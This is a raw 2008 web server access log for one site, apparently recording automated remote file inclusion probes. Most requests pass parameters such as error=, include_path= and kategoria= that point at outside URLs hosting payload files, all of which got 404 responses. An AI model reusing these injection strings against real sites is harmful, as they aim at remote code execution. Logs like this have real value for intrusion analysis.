218.106.254.18 - - [11/Oct/2008:06:52:15 -0700] "GET /include/monitoring/engine/errors.php?error=http://usiauctions.com/logo/chillum.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
218.106.254.18 - - [11/Oct/2008:06:52:15 -0700] "GET /include/monitoring/engine/errors.php?error=http://usiauctions.com/logo/h00dr4p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
217.169.46.98 - - [11/Oct/2008:06:52:16 -0700] "GET /logs/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "www.jooty.com"
217.169.46.98 - - [11/Oct/2008:06:52:16 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "www.jooty.com"
217.169.46.98 - - [11/Oct/2008:06:52:16 -0700] "GET /logs/access.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "www.jooty.com"
218.106.254.18 - - [11/Oct/2008:06:52:16 -0700] "GET /logs//include/monitoring/engine/errors.php?error=http://usiauctions.com/logo/chillum.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
218.106.254.18 - - [11/Oct/2008:06:52:17 -0700] "GET /logs//include/monitoring/engine/errors.php?error=http://usiauctions.com/logo/h00dr4p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
218.106.254.18 - - [11/Oct/2008:06:55:37 -0700] "GET /logs/access_080928.log//poll/poll_ssi.php?include_path=http://usiauctions.com/logo/chillum.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
218.106.254.18 - - [11/Oct/2008:06:55:38 -0700] "GET /logs/access_080928.log//poll/poll_ssi.php?include_path=http://usiauctions.com/logo/h00dr4p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
89.218.85.18 - - [11/Oct/2008:06:56:01 -0700] "GET /logs/access_080924.log//galeria.php?start=0&kategoria=http://alb0z.freehostia.com/kosova.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.jooty.com"
89.218.85.18 - - [11/Oct/2008:06:56:01 -0700] "GET /galeria.php?start=0&kategoria=http://alb0z.freehostia.com/kosova.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.jooty.com"
89.218.85.18 - - [11/Oct/2008:06:56:05 -0700] "GET /logs/access.log//galeria.php?start=0&kategoria=http://alb0z.freehostia.com/kosova.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.jooty.com"
200.199.75.194 - - [11/Oct/2008:06:56:47 -0700] "GET /logs/access_080919.log%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.geocities.com/kucluk_pamungkas/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
200.11.67.242 - - [11/Oct/2008:06:57:15 -0700] "GET /logs/access_080924.log//galeria.php?start=0&kategoria=http://alb0z.freehostia.com/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jooty.com"
200.11.67.242 - - [11/Oct/2008:06:57:15 -0700] "GET /galeria.php?start=0&kategoria=http://alb0z.freehostia.com/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jooty.com"
200.11.67.242 - - [11/Oct/2008:06:57:16 -0700] "GET /logs//galeria.php?start=0&kategoria=http://alb0z.freehostia.com/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jooty.com"
200.11.67.242 - - [11/Oct/2008:06:57:24 -0700] "GET /logs/access_080924.log//galeria.php?start=0&kategoria=http://alb0z.freehostia.com/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jooty.com"
200.11.67.242 - - [11/Oct/2008:06:57:24 -0700] "GET /galeria.php?start=0&kategoria=http://alb0z.freehostia.com/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jooty.com"
200.11.67.242 - - [11/Oct/2008:06:57:25 -0700] "GET /logs//galeria.php?start=0&kategoria=http://alb0z.freehostia.com/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:57:25 -0700] "GET /logs/access.log//mambots/content/multithumb/errors.php?error=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:57:25 -0700] "GET /logs/access.log//mambots/content/multithumb/errors.php?error=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:57:25 -0700] "GET /mambots/content/multithumb/errors.php?error=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:57:26 -0700] "GET /mambots/content/multithumb/errors.php?error=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:57:26 -0700] "GET /logs//mambots/content/multithumb/errors.php?error=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:57:26 -0700] "GET /logs//mambots/content/multithumb/errors.php?error=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
78.159.111.131 - - [11/Oct/2008:06:57:37 -0700] "GET /logs/access.log%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://spam.mywebshopping.com/one.coms%0D?? HTTP/1.1" 404 275 "-" "libwww